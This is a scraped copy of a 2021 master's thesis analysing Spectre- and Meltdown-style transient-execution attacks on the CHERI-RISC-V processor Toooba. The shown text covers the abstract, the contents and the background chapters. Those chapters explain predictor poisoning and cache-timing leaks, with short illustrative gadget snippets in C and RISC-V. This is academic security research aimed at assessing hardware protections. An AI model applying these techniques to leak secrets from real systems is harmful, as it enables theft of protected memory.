analysis of transient-execution attacks on the out-of

99
IN DEGREE PROJECT COMPUTER SCIENCE AND ENGINEERING, SECOND CYCLE, 30 CREDITS , STOCKHOLM SWEDEN 2021 Analysis of Transient-Execution Attacks on the out-of-order CHERI- RISC-V Microprocessor Toooba FRANZ ANTON FUCHS KTH ROYAL INSTITUTE OF TECHNOLOGY SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE

Upload: others

Post on 12-Nov-2021

8 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Analysis of Transient-Execution Attacks on the out-of

IN DEGREE PROJECT COMPUTER SCIENCE AND ENGINEERING,SECOND CYCLE, 30 CREDITS

, STOCKHOLM SWEDEN 2021

Analysis of Transient-Execution

Attacks on the out-of-order CHERI-

RISC-V Microprocessor Toooba

FRANZ ANTON FUCHS

KTH ROYAL INSTITUTE OF TECHNOLOGY

SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE

Page 2: Analysis of Transient-Execution Attacks on the out-of

Analysis of

Transient-Execution Attacks

on the out-of-order

CHERI-RISC-V

Microprocessor Toooba

FRANZ ANTON FUCHS

Master in Computer Science

Date: January 27, 2021

Supervisor: Roberto Guanciale

Examiner: Mads Dam

School of Electrical Engineering and Computer Science

Host Organisation: University of Cambridge Department of

Computer Science and Technology

Swedish title: Analys av transient-execution attacker på

out-of-order CHERI-RISC-V mikroprocessorn Toooba

Page 3: Analysis of Transient-Execution Attacks on the out-of

ii

Analysis of Transient-Execution Attacks on the out-of-order CHERI-RISC-V

Microprocessor Toooba

Copyright © 2021 by Franz Anton Fuchs

All rights reserved. No part of this work may be reproduced or used in any

manner without written permission of the copyright owner except for the use

of quotations.

Page 4: Analysis of Transient-Execution Attacks on the out-of

iii

Abstract

Transient-execution attacks have been deemed a large threat for microarchitec-

tures through research in recent years. In this work, I reproduce and develop

transient-execution attacks against RISC-V and CHERI-RISC-V microarchi-

tectures. CHERI is an instruction set architecture (ISA) security extension that

provides fine-grained memory protection and compartmentalisation. I con-

duct transient-execution experiments for this work on Toooba – a superscalar

out-of-order processor implementing CHERI-RISC-V. I present a new sub-

class of transient-execution attacks dubbed Meltdown-CF(Capability Forgery).

Furthermore, I reproduced all four major Spectre-style attacks and important

Meltdown-style attacks. This work analyses all attacks and explains the out-

come of the respective experiments based on architectural and microarchitec-

tural decisions made by their developers. While all four Spectre-style attacks

could be successfully reproduced, the cores do not appear to be vulnerable

to prior Meltdown-style attacks. I find that Spectre-BTB and Spectre-RSB

pose a large threat to CHERI systems as well as the newly developed transient-

execution attack subclass Meltdown-CF. However, all four major Spectre-style

attacks and all attacks of the Meltdown-CF subclass violate CHERI’s security

model and therefore require security mechanisms to be put in place.

Page 5: Analysis of Transient-Execution Attacks on the out-of

iv

Sammanfattning

Transient-execution-attacker har utgjort ett stort hot för mikroarkitekturer i

senaste årens forskning. I den här avhandlingen återskapar jag och utvecklar

transient-execution-attacker mot RISC-V och CHERI-RISC-V mikroarkitek-

turer. CHERI är en instruction set architecture (ISA) security extension som

ger finkornig memory protection och compartmentalisation. I avhandlingen

genomför jag transient-execution-experiment på Toooba – en superscalar out-

of-order processor som implementerar CHERI-RISC-V. Jag presenterar en ny

sorts transient-execution-attack som kallas Meltdown-CF(Capability Forge-

ry). Därutöver har jag återskapat de fyra stora Spectre-style-attackerna och

viktiga Meltdown-style-attacker. I avhandlingen analyserar jag dessa attac-

ker och förklarar resultaten från experimenten utifrån de arkitektoniska och

mikroarkitektoniska besluten tagna av respektive utvecklare. Medan de fyra

Spectre-style-attackerna kunde återskapas med framgång verkar inte proces-

sorkärnorna vara sårbara för tidigare Meltdown-style-attacker. Jag kom fram

till att Spectre-BTB och Spectre-RSB såväl som den nya sortens transient-

execution-attack Meltdown-CF utgör ett stort hot för CHERI-system. Däremot

bryter de fyra stora Spectre-style-attackerna och alla attacker av Meltdown-

CF-typen mot CHERI:s threat-model och kräver därmed säkerhetsmekanismer

för att verkställas.

Page 6: Analysis of Transient-Execution Attacks on the out-of

v

Acknowledgements

I would like to thank:

• Simon W. Moore, my supervisor at Cambridge, who – even though the

circumstances were not in our favour – believed in me and gave me the

opportunity to conduct my work remotely. Furthermore, he provided

lots of feedback throughout close and regular supervision sessions.

• Jonathan Woodruff, my advisor, who spent many hours explaining vari-

ous concepts to me, was always happy to discuss my ideas, and provided

feedback and inspirations that heavily impacted my work.

• Peter Rugg, Alexandre Joannou, Jessica Clarke, Marno van der Maas,

and others who assisted me in solving a wide range of problems and

made me rethink my approaches and ideas.

• Robert N. M. Watson and the entire CHERI team who warmly welcomed

me into the team and created a helpful and encouraging atmosphere.

• Roberto Guanciale, my supervisor at KTH, who made it possible to con-

duct this thesis work within the CHERI group and supported me through

the entire process by providing important high-level feedback.

Page 7: Analysis of Transient-Execution Attacks on the out-of
Page 8: Analysis of Transient-Execution Attacks on the out-of

Contents

1 Introduction 1

1.1 Research Question and Scope . . . . . . . . . . . . . . . . . . . 2

1.2 Contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

1.3 Figures and Permissions . . . . . . . . . . . . . . . . . . . . . . 2

1.4 Outline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

2 Background 4

2.1 Microarchitectural Background . . . . . . . . . . . . . . . . . . 4

2.1.1 RISC-V . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

2.1.2 Caches and Memory . . . . . . . . . . . . . . . . . . . 6

2.1.3 Out-of-order Execution . . . . . . . . . . . . . . . . . . 6

2.1.4 Speculative Execution . . . . . . . . . . . . . . . . . . 7

2.1.5 Memory Disambiguation . . . . . . . . . . . . . . . . . 9

2.2 Transient-Execution Attacks . . . . . . . . . . . . . . . . . . . 9

2.2.1 Spectre Attacks . . . . . . . . . . . . . . . . . . . . . . 10

2.2.2 Meltdown Attacks . . . . . . . . . . . . . . . . . . . . . 13

2.2.3 Timing Side Channels . . . . . . . . . . . . . . . . . . 15

2.3 Security Mechanisms . . . . . . . . . . . . . . . . . . . . . . . 15

2.3.1 Tagging Microarchitectural State . . . . . . . . . . . . 16

2.3.2 Special Instructions . . . . . . . . . . . . . . . . . . . . 16

2.4 CHERI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

2.4.1 CHERI Abstract Model . . . . . . . . . . . . . . . . . 17

2.4.2 CHERI-RISC-V . . . . . . . . . . . . . . . . . . . . . . 21

2.4.3 CHERI-RISC-V Hardware . . . . . . . . . . . . . . . . 22

2.4.4 CHERI Software Stack . . . . . . . . . . . . . . . . . . 22

2.4.5 CHERI Security Model . . . . . . . . . . . . . . . . . 23

2.5 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

vii

Page 9: Analysis of Transient-Execution Attacks on the out-of

viii CONTENTS

3 Methods 26

3.1 Toooba . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26

3.2 Research Methodology . . . . . . . . . . . . . . . . . . . . . . 28

3.3 Common Mechanisms . . . . . . . . . . . . . . . . . . . . . . . 29

3.3.1 Flushing Caches . . . . . . . . . . . . . . . . . . . . . . 29

3.3.2 Timing Measurements . . . . . . . . . . . . . . . . . . 30

4 RISC-V Results 32

4.1 Spectre Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 32

4.1.1 Spectre-PHT . . . . . . . . . . . . . . . . . . . . . . . . 33

4.1.2 Spectre-PHT-Write . . . . . . . . . . . . . . . . . . . . 34

4.1.3 Spectre-BTB . . . . . . . . . . . . . . . . . . . . . . . . 34

4.1.4 Spectre-RSB . . . . . . . . . . . . . . . . . . . . . . . . 34

4.1.5 Spectre-STL . . . . . . . . . . . . . . . . . . . . . . . . 35

4.2 Meltdown Attacks . . . . . . . . . . . . . . . . . . . . . . . . . 36

4.2.1 Meltdown-US . . . . . . . . . . . . . . . . . . . . . . . 36

4.2.2 Meltdown-GP . . . . . . . . . . . . . . . . . . . . . . . 37

5 CHERI-RISC-V Results 38

5.1 Spectre Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 38

5.1.1 Spectre-PHT . . . . . . . . . . . . . . . . . . . . . . . . 38

5.1.2 Spectre-PHT-CHERI-Write . . . . . . . . . . . . . . . 41

5.1.3 Spectre-BTB on CHERI-Sandboxes . . . . . . . . . . 41

5.1.4 Priv-Mode Attacks . . . . . . . . . . . . . . . . . . . . 45

5.1.5 Spectre-RSB . . . . . . . . . . . . . . . . . . . . . . . . 46

5.1.6 Spectre-STL . . . . . . . . . . . . . . . . . . . . . . . . 48

5.2 Meltdown Attacks . . . . . . . . . . . . . . . . . . . . . . . . . 49

5.2.1 Meltdown-US-CHERI . . . . . . . . . . . . . . . . . . 49

5.2.2 Meltdown-GP-CHERI . . . . . . . . . . . . . . . . . . 50

5.2.3 Meltdown-CF . . . . . . . . . . . . . . . . . . . . . . . 51

6 Discussion 58

6.1 SinglePCC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58

6.1.1 Mechanism . . . . . . . . . . . . . . . . . . . . . . . . 58

6.1.2 Testing SinglePCC . . . . . . . . . . . . . . . . . . . . 59

6.1.3 Hardening SinglePCC . . . . . . . . . . . . . . . . . . 60

6.1.4 Spectre-BTB in Kernel Code . . . . . . . . . . . . . . 62

6.2 Preventing Meltdown-CF . . . . . . . . . . . . . . . . . . . . . 63

6.3 Ethics and Sustainability . . . . . . . . . . . . . . . . . . . . . 64

6.4 Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64

Page 10: Analysis of Transient-Execution Attacks on the out-of

CONTENTS ix

7 Conclusions 66

Bibliography 67

A Full C Attack 73

B Full CHERI-RISC-V Attack 78

Page 11: Analysis of Transient-Execution Attacks on the out-of

x CONTENTS

Acronyms

ABI Application Binary Interface

ALU Arithmetic Logic Unit

ASID Address Space Identifier

ASR Access System Registers

BHT Branch History Table

BOOM Berkeley Out-of-Order Machine

BTB Branch Target Buffer

CHERI Capability Hardware Enhanced RISC Instructions

CID CHERI Compartment Identifier

CISC Complex Instruction Set Computing

CSR Control and Status Register

DDC Default Data Capability

FPGA Field Programmable Gate Array

FPU Floating Point Unit

HDL Hardware Description Language

ILP Instruction-Level Parallelism

IR Intermediate Representation

ISA Instruction-Set Architecture

LFB Line Fill Buffer

LLC Last Level Cache

LSB Least Significant Bit

LSQ Load-Store Queue

MMU Memory Management Unit

Page 12: Analysis of Transient-Execution Attacks on the out-of

CONTENTS xi

MSB Most Significant Bit

PCC Program Counter Capability

PHT Pattern History Table

PTE Page Table Entry

RAS Return Address Stack

RIDL Rogue In-Flight Data Load

RISC Reduced Instruction Set Computing

ROB Reorder Buffer

ROP Return-Oriented Programming

RSB Return Stack Buffer

SCR Special Capability Register

STL Store-To-Load

SUM Supervisor User Memory

TLB Translation Lookaside Buffer

Page 13: Analysis of Transient-Execution Attacks on the out-of
Page 14: Analysis of Transient-Execution Attacks on the out-of

Chapter 1

Introduction

Memory safety in general has been one of the most difficult security problems

in the secure computing world. The heartbleed bug gives a good example

of the severity of memory safety problems and explains the need for strong

memory safety [1]. One approach to mitigate these kinds of attacks is Cyclone

– a dialect of C that aims to achieve memory safety [2]. Similar approaches

are CCured [3] that aims to enhance type-safety of C programs and Checked

C [4] that helps to guarantee spatial memory safety for C programs.

Another approach to implement memory safety is in-memory capability

systems, which enforce memory accesses through capabilities in place of in-

teger addresses. The idea of capability systems is not new, but has existed for

more than forty years, e.g., the CAP Computer [7] or Ackerman’s architecture

[8]. However, capability systems have never been commercially successful.

The CHERI project starting in 2010 revived the idea of capability systems

and had a large impact on the field. The main idea of CHERI is to effectively

ensure spatial and temporal memory safety. CHERI systems can mitigate at-

tacks targeting spatial or temporal memory safety vulnerabilities. However, in

January 2018, a new class of attacks was published called transient-execution

attacks. These kinds of attacks had a major impact on the processor industry

and pose a large threat to CHERI systems as they can circumvent the security

mechanisms in place. Transient-execution attacks have partly been evaluated

on RISC-V and not evaluated at all on CHERI-RISC-V systems. Therefore,

the question remains whether these attacks are also possible on RISC-V and

CHERI-RISC-V systems, which this thesis aims to answer.

1

Page 15: Analysis of Transient-Execution Attacks on the out-of

2 CHAPTER 1. INTRODUCTION

1.1 Research Question and Scope

The main research question evaluated throughout the course of this thesis is:

Is the out-of-order CHERI-RISC-V processor Toooba vulnerable to transient-

execution attacks? In order to answer that question, I will attempt to repro-

duce all major transient-execution attacks in both RISC-V and CHERI-RISC-

V. This work is limited to attacks that include transiently executed instructions

revealing secrets. Attacks inferring information about the program’s state, e.g.,

BranchScope [9] without transient execution are not part of this thesis work.

Developing and implementing mitigation mechanisms is out of the scope.

However, it is part of this work to point out possibilities for mechanisms that

can be implemented. Furthermore, I consider it in scope to test whether ex-

isting mitigation mechanisms effectively mitigate transient-execution attacks.

However, it is considered out-of-scope to thoroughly test and evaluate mitiga-

tion mechanisms including a performance analysis and which advantages and

drawbacks each mechanism has.

1.2 Contributions

In this work, I make the following contributions:

• The first work to completely reproduce the major transient-execution

attacks on a RISC-V microarchitecture.

• The first-ever work to reproduce the major transient-execution attacks

on a CHERI-RISC-V microarchitecture.

• Development of the new subclass of Meltdown-CF attacks.

• Developing an extensible framework for exploring transient-execution

attacks and creating a platform to research mitigation mechanisms in

RISC-V and CHERI-RISC-V microarchitectures.

• Testing and hardening the SinglePCC implementation in Toooba.

1.3 Figures and Permissions

All figures with a citation are used with the permission of the publisher. Fig-

ures without a citation were created by myself.

Page 16: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 1. INTRODUCTION 3

1.4 Outline

In Chapter 2, I explain the background of this thesis work including modern

microarchitectures, transient-execution attacks, and the CHERI-RISC-V ar-

chitecture. In the next chapter, I present the research methods applied in the

course of this thesis. This will be followed by Chapter 4 and Chapter 5, which

give an overview of the attacks included in the framework for RISC-V and

CHERI-RISC-V microarchitectures, respectively. Chapter 6 will discuss the

results and their implications. The thesis will be concluded in Chapter 7.

Page 17: Analysis of Transient-Execution Attacks on the out-of

Chapter 2

Background

In this chapter, I introduce the microarchitectural background of transient-

execution attacks followed by the attacks themselves. Next, I describe CHERI

systems, which will be the basis for the research done throughout the thesis

work.

2.1 Microarchitectural Background

Microarchitectures use sophisticated mechanisms in order to improve overall

performance. In industry, the focus has been on performance, but not secu-

rity. This led to the emergence of transient-execution attacks, which exploit

these mechanisms. This section describes RISC-V and the microarchitectural

mechanisms that build the basis for transient-execution attacks.

2.1.1 RISC-V

RISC-V [10] is an extensible open-source Instruction-Set Architecture (ISA)

that has received a great deal of attention in academia and is gaining traction

in industry. An ISA describes an abstract model of the computer including

the architectural state of the machine, instructions to change the state, regis-

ters, memory access, and other input/output specifications. It is important to

distinguish between the terms architecture and microarchitecture. A microar-

chitecture is an implementation of an architecture. Therefore, binary compati-

bility exists between microarchitectures that implement the same architecture.

A program causes visible changes to the architectural state, but the microar-

chitectural state is mainly invisible to the program.

4

Page 18: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 5

The RISC-V ISA is a Reduced Instruction Set Computing (RISC) architec-

ture, which means that it aims to have a small set of instructions where each in-

struction does only one task. In contrast, instructions on Complex Instruction

Set Computing (CISC) architectures can do several operations within a single

instruction. RISC-V has similarities to other RISC architectures, e.g., MIPS

and ARM, but it differs mainly because of its modular nature. The unprivi-

leged specification [11] containing information on the user-space instructions

describes a minimal instruction set – the base integer instruction set – that has

to be implemented on all microarchitectures and several other extensions that

can be implemented. This is the reason why RISC-V is considered a design

space.

The RISC-V specification defines in the current unprivileged specification

13 extensions [11]. Widely implemented are the standard extensions for inte-

ger multiplication and division, atomic instructions, single-precision floating-

point, double-precision floating-point, and compressed instructions. RISC-V

extensions are abbreviated with capital letters , e.g., A for the standard ex-

tension for atomic instructions. Furthermore, RISC-V defines three different

register bit widths 32, 64, and 128 bits. RISC-V microprocessors have a name

tag to specify which extensions and features of RISC-V they implement, e.g.,

RV32IACMU, where RV32 stands for RISC-V 32 bits wide and all following

capital letters identify the instruction set extensions this microprocessor im-

plements. The capital letter G is used to refer the general-purpose ISA, which

includes the integer operations, multiplication and division operations, atomic

operations, single-precision floating point operations, and double-precision

floating point extensions abbreviated as "IMAFD".

The RISC-V privileged specification [12] defines three privilege modes:

M(achine), S(upervisor), and U(ser). One additional privilege mode might

be added in the future as it is held reserved in the description. Machine

mode presents the highest privilege level and user mode the lowest privilege

level. Like with the basic integer instruction set, every RISC-V implementa-

tion needs to implement machine mode. The implementation of other modes

is an implementation choice. When supervisor mode is implemented, this is

labeled with an S in the name tag. For user mode, the letter U is added to the

name tag. In machine mode, addresses are interpreted as physical addresses.

In supervisor mode, address translation is conducted. The main information

for address translation, e.g. the Address Space Identifier (ASID), is stored in

the satp register, which is the supervisor address translation and protection

register. The privileged RISC-V architectures manual [12] specifies 32 bit, 39

bit, and 48 bit wide virtual addresses.

Page 19: Analysis of Transient-Execution Attacks on the out-of

6 CHAPTER 2. BACKGROUND

Machine mode and supervisor mode define new registers for special pur-

poses, which are called Control and Status Registers (CSRs) in RISC-V. These

registers are used to get information about the microarchitecture, but are also

used to control the architecture, e.g., trap handling. The chapters Machine-

Level ISA and Supervisor-Level ISA of the privileged specification [12] contain

further information on exception handling and related topics.

2.1.2 Caches and Memory

DRAM access times are slow compared to the clock frequency of the proces-

sor. If a load issued by the processor had to pay the full load penalty for each

load operation, performance would be significantly decreased. This creates

the need for low-latency memory. One solution are caches that hold the most

recently accessed data. The access time to these data will be small, but ac-

cess times of other data that is not stored in caches will still be large. Modern

processors have multiple cache levels that differ in size, speed, and cost. The

Level-1(L1) cache has the fastest access time, but is also the smallest. The

cache on the highest level – also referred to as Last Level Cache (LLC) – has

the slowest access time, but can store the most data. In general: The greater the

level number, the slower the access times become, but the more data this cache

can store. Memory is stored in the form of cache lines in caches. One cache

line contains multiple adjacent memory words. Many modern processors have

inclusive caches, which means that every cache line stored in a lower level is

also present in every cache level above that. In modern processors, every core

has its own L1 cache and the LLC – the slowest and biggest cache – is shared

among all cores. The intermediate caches may be configured exclusive to a

core or shared depending on the policy of the producer. Furthermore, caches

are well suited for the principle of locality, which programs exhibit. Temporal

locality describes the situation when a program accesses memory at the same

address more than once and spatial locality is shown when the program ac-

cesses memory at addresses nearby of an address already accessed. By storing

the cache lines of the most recently accessed data, caches manage to improve

performance for programs that exhibit both temporal and spatial locality.

2.1.3 Out-of-order Execution

A microprocessor executes a program, which is defined by a sequence of in-

structions as it is written by the programmer. This order of instructions de-

fines the program’s behaviour and is called in-order or program-order. Sim-

Page 20: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 7

ple microprocessors execute instruction by instruction following this order.

However, modern microprocessors incorporate out-of-order execution, which

means that instructions are microarchitecturally not executed in-order. This

is used to enhance performance. The principle of out-of-order execution is

based on the fact that instructions that do not depend on each other can be ex-

ecuted in parallel and in any arbitrary order as the final result will not change.

The first algorithm for full out-of-order execution has been demonstrated by

Tomasulo [13].

The main goal of modern processors is to hide the latency of instructions

and extract Instruction-Level Parallelism (ILP), e.g., loads and stores that miss

the L1 Data cache, by executing other independent instructions in the mean-

time. This increases the overall performance of the microprocessor. Out-of-

order execution increases the divergence between the architectural and mi-

croarchitectural state. An instruction becomes visible when it changes the

architectural state. Instructions must become visible in program-order, other-

wise the new state diverges from a valid architectural state, which means that a

different program behaviour appears. An instruction retires – also called com-

mits – in the cycle when it changes the architectural state. Instruction commits

are in sequential order matching the programmer’s model presented in the ISA.

2.1.4 Speculative Execution

An important performance criterion is to keep the processor’s pipeline filled

at all times. The processor needs to fetch the correct instructions for that. The

control-flow of a program depends on multiple parameters including user in-

put. Control-flow is steered by direct and indirect branches in machine code.

A direct branch is a jump to an address that is determined by an offset of the

branch instruction. An indirect branch is a jump to a value stored in a register.

In order to fetch the correct instructions, the microprocessor would need to

know whether a branch is taken and what its jump target is, which is is not

possible though. Therefore, modern processors use branch prediction. The

processor will predict the information it needs. Following its prediction, the

processor will execute the instructions it thinks are correct. If the processor’s

prediction turns out to be right, meaning that the predicted values match the

program’s real values, the instructions can commit. Otherwise, the instruc-

tions need to be rolled back. Therefore, speculative execution is not visible on

the architectural level. If the microprocessor’s speculation is successful, this

can lead to a large performance gain. A speculative microprocessor has special

units that handle prediction. They also differ in for which kinds of branches

Page 21: Analysis of Transient-Execution Attacks on the out-of

8 CHAPTER 2. BACKGROUND

they are responsible for prediction.

Branch Predictors

Branch prediction can be either static or dynamic. A static branch predic-

tor always makes the same decision and does not change during runtime of a

program. On the other hand, a dynamic branch predictor may change its pre-

diction as it learns at runtime. I will focus on dynamic branch prediction as

it is the most used technique in modern microprocessors. A branch predictor

mainly consists of two sub units. The Pattern History Table (PHT) stores the

history of a particular branch. Having that information, the processor predicts

whether the branch is taken or not. This can be either local or global. A lo-

cal PHT stores only the history, e.g., strongly taken for one branch, whereas

a global PHT also takes other branches and their outcomes into account. The

processor also has a Branch Target Buffer (BTB), which stores the branch tar-

get, which is the location that the control-flow will go to if the branch is taken.

A microprocessor can also implement both local and global PHTs and choose

which one to use during runtime depending on the misprediction ratio. This

is called a Tournament Predictor [14].

In most microprocessors, branch prediction covers all direct and indirect

branch instructions with the exception of call and return instructions. They

are handled in separate logic as presented in the paragraph below. However,

instances of both instructions can also be placed in the BTB, e.g., as a mitiga-

tion mechanism against attacks or because the microprocessor does not have

dedicated logic for these two instructions.

Return Stack Buffers

A Return Stack Buffer (RSB) – also called Return Address Stack – is a hard-

ware buffer for return addresses. For every call to a function the return

address is pushed to the stack. Every return instruction pops one return ad-

dress. The return address is also stored on the software stack. The main goal

addressed by a RSB is to enhance performance. Loading the return address

from the software stack can lead to stall cycles, e.g., because the branch needs

to be taken early in the pipeline and the load can only be performed later in the

pipeline. Therefore, microprocessors use a RSB to predict the return address

and keep the pipeline filled with instructions. In case that the addresses of the

RSB and the software stack match, a performance gain is achieved. Otherwise,

speculatively executed instructions need to be rolled back.

Page 22: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 9

sd t0, 0(a0)

ld t1, 0(a1)

Figure 2.1: The RISC-V store and load instructions are dependent if a0 and a1

are resolved to the same physical address.

2.1.5 Memory Disambiguation

When reordering instructions the microprocessor has to ensure that it does

not break any dependencies. For a store and a load operation, a true depen-

dency exists if the load returns the value from memory that was written by the

store operation preceding the load where both operations accessed the same

address. The store and load operations shown in Figure 2.1 are dependent if

a0 and a1 are resolved to the same physical address. The process of detecting

true dependencies between memory operations is called memory disambigua-

tion. However, at the point of reordering instructions the microprocessor might

not know the full addresses yet, e.g., because they are loaded from memory

and these loads have not finished yet or the register is being updated and will

be made available on a forwarding path. Therefore, the microprocessor can-

not guarantee that these instructions are independent. However, in order to

achieve high performance goals loads have to be executed as early as possi-

ble such that a possible miss penalty can be hidden. To enhance performance,

modern microprocessors use memory disambiguation with speculation as first

presented by Gallagher et al. [16]. The microprocessor assumes that the load

is not dependent on the store and executes the load and instructions dependent

on the load speculatively before the store. When the address of the store is

resolved the microprocessor checks whether there in fact is a dependency and

in case of that it re-executes the load and its dependent instructions.

2.2 Transient-Execution Attacks

Transient instructions are instructions that are erroneously executed by the

processor due to out-of-order or speculative execution but would not have ap-

peared otherwise. Transient execution is not visible on the architectural level

as all transient instructions should not have been executed, are rolled back, and

never commit to the architectural state. However, transient execution has ef-

fects on the microarchitectural state. These state changes can be read through

side channels. This is the basis of transient-execution attacks. They trick the

Page 23: Analysis of Transient-Execution Attacks on the out-of

10 CHAPTER 2. BACKGROUND

microprocessor into executing several instructions transiently and then gain

knowledge through side channels. The most used side channel for speculative

attacks is timing. There exist other side channels like power consumption or

heat dissipation, but in this work I will only use timing side channels. The

choice to only use timing side channels is supported by all publications on

transient-execution attacks as timing side channels have proved to be effec-

tive [18, 19, 20]. Speculative Attacks can be subdivided into Spectre Attacks

and Meltdown Attacks [19]. More sophisticated classifications [20] exist, but

are not needed for this thesis work.

2.2.1 Spectre Attacks

Spectre Attacks focus on microarchitectural state changes due to misprediction

of control or data flow. Spectre attacks were first demonstrated by Kocher et

al. [22]. They can further be subdivided into four categories regarding which

part of speculative execution they seek to exploit.

Spectre-PHT

Following the name, Spectre-PHT aims to attack the Pattern History Table.

The basic attack principle is to train the history of a branch such that the pre-

diction’s outcome follows the attackers intentions. A simple example – derived

from [22] – is shown in Figure 2.2. The if statement will result in a branch

instruction. The first step of the attacker is to train the PHT of this branch

such that it is strongly predicted to not taken, which means that the condition

will evaluate to true. This can be accomplished by calling the code with this

if statement with values for the index i that are less than array_size. The

next step is to conduct the actual attack. The attacker can provide any desired

value for i as the branch prediction will speculatively execute the body of the

if statement. Therefore, the attacker can trick the microprocessor in execut-

ing an arbitrary load without checking the bounds in the first place. Using the

data retrieved from the load to sec_arr as an index to a user accessible array

usr_arr will change the microarchitectural state. Later, the microprocessor

will detect the misprediction and roll back the instructions. However, microar-

chitectural side effects have already taken place and stay visible even though

none of the speculatively executed instructions committed. Spectre-PHT is

also known as Spectre v1 and presented as such in [22].

Page 24: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 11

int j;

int r = 0;

if (i < array_size)

{

j = sec_arr[i];

r = usr_arr[j];

}

Figure 2.2: Spectre-PHT example written in C.

Spectre-BTB

Opposed to Spectre-PHT, Spectre-BTB attacks the Branch Target Buffer. A

BTB has only a limited number of entries. Therefore, the target address of

a branch instruction has to be mapped to an entry by a hash function. In the

original form as demonstrated by Kocher et al. [22] the small size of the BTB is

exploited by attackers. Because of the small size of the BTB, the hash function

can lead to frequent collisions. When a branch is seen by the microprocessor, it

looks up the corresponding entry in the BTB and uses this target address for the

prediction. As for Spectre-PHT, Spectre-BTB consists of two phases. First, the

attacker injects a malicious branch target into the BTB at the entry of a branch

executed by the victim program. Figure 2.3 shows two branch instructions,

which I assume to be mapped to the same BTB entry. The injection can be done

by executing the second branch instruction, which will overwrite the entry of

the first one. In the second phase, the attacker triggers the first instruction

to be executed. Speculatively, the branch target address in the BTB entry –

which is the branch target of the second branch instruction – will be used and

the control-flow will be speculatively directed there. This target is attacker

controlled and will leak the desired information. This variant is called out-of-

place Spectre-BTB.

Another variant is in-place Spectre-BTB. In this case, only one branch

instruction is used. The attacker manages, e.g. by user input, to poison the

BTB entry of this branch instruction. The next time, the code with this branch

instruction is executed, the branch prediction will direct the control-flow spec-

ulatively to attacker intended code, which the attacker can use to leak informa-

tion. Spectre-BTB is also known as Spectre v2 and presented as such in [22].

Page 25: Analysis of Transient-Execution Attacks on the out-of

12 CHAPTER 2. BACKGROUND

00000008: 00060067 jr a2

...

00001008: 00078067 jr a5

Figure 2.3: Indirect jumps mapped to the same BTB entry.

Spectre-RSB

Spectre-RSB attacks were discovered later than the original Spectre attacks

and aim to attack speculative execution involving the Return Stack Buffer [23,

24]. There exist multiple attacks flavours of this attack that use subtleties of a

particular microarchitecture, but all have the same goal in common. Spectre-

RSB attacks target a mismatch between the address on the hardware return

stack and the address on the software return stack. The microprocessor will

use the address in the RSB and speculatively direct the control-flow there. The

attack consists of the injection phase, which changes the entry at the current

index of the RSB and the side channel sending phase. This triggers side effects

by speculatively returning to the injected address.

Spectre-STL

Spectre- Store-To-Load (STL) differs substantially from the other Spectre at-

tacks as it does not attack control-flow, but data flow. As described in Section

2.1.3, the microprocessor wants to execute load instruction as early as possible

to hide the load penalty. A load instruction can pass a store instruction if they

are independent. Load and store instructions are independent if their mem-

ory addresses differ. However, memory addresses might not be fully available

to the microprocessor when it needs to make the decision whether the load

is allowed to pass. Therefore, the microprocessor speculates whether the ad-

dresses are independent. Sophisticated processors have dedicated memory dis-

ambiguation logic for this purpose as described in Section 2.1.5. An example

of the attack is shown in Figure 2.4. The first step is to trick the microproces-

sor into predicting that addr1 and addr2 are different. Then the load from

addr2 will speculatively be executed before the store to addr1. In the ex-

ample, the memory is overwritten with zeros at this address. The attacker can

manage to speculatively read out the stale data before it is overwritten. This

attack has also the name Spectre v4 and was demonstrated first by Horn [25].

Page 26: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 13

*addr1 = 0x00;

val = *addr2;

Figure 2.4: Spectre-STL example in C.

Rogue In-Flight Data Load

Rogue In-Flight Data Load (RIDL) [26] is an attack of microprocessors that

use Line Fill Buffers (LFBs). A LFB is used in microprocessors in order to

prevent caches from blocking when a miss occurs. In order to achieve high

performance goals, microprocessors speculatively use in flight store data for

loads without checking permissions in the first step. A store is in flight, when

it is currently in the LFB, but not has not committed yet, e.g., due to a cache

miss. Another process running on the same hardware thread can observe this

in-flight store by performing a random load and leak its value through a side

channel. The general attack idea is as follows: A victim process performs a

memory access to secret data. This memory access will be handled via LFBs

and an entry holding the secret data will be allocated. Next, an attacker per-

forms a memory access, which will be speculatively satisfied by an LFB entry.

This returns the secret data to the attacker who uses it as an index to a buffer.

This will load a line into the caches and therefore reveals the secret value to

the attacker. Eventually, the processor will roll back the execution because of

misspeculation, but the effects to the cache will remain. With this attack, one

can leak entire pages from another running process.

2.2.2 Meltdown Attacks

Meltdown attacks focus on microarchitectural state changes due to transient

execution of instructions following a faulting instruction. Therefore, Melt-

down attacks do not attack branch prediction features of the microprocessor,

but out-of-order execution. They also rely on at which point access rights are

checked and hardware exceptions are thrown.

Meltdown-US

The original Meltdown attack – demonstrated by Lipp et al. [27] – seeks to

access a page for supervisor use only from user space. Therefore, this attack

is also called Meltdown-US – User/Supervisor. The goal of the attack is to

read out supervisor-only memory without having sufficient privilege level for

that. The attack exploits that the protection domain privilege is not checked

Page 27: Analysis of Transient-Execution Attacks on the out-of

14 CHAPTER 2. BACKGROUND

when actually accessing the page, but in later pipeline stages. Eventually this

instruction will fault and raise a hardware exception, but in the meantime tran-

siently executed instructions following the faulting instruction will reveal the

sought value through side channels. By conducting this attack multiple times,

an attacker can read out the entire kernel of an operating system [27].

Foreshadow Attacks

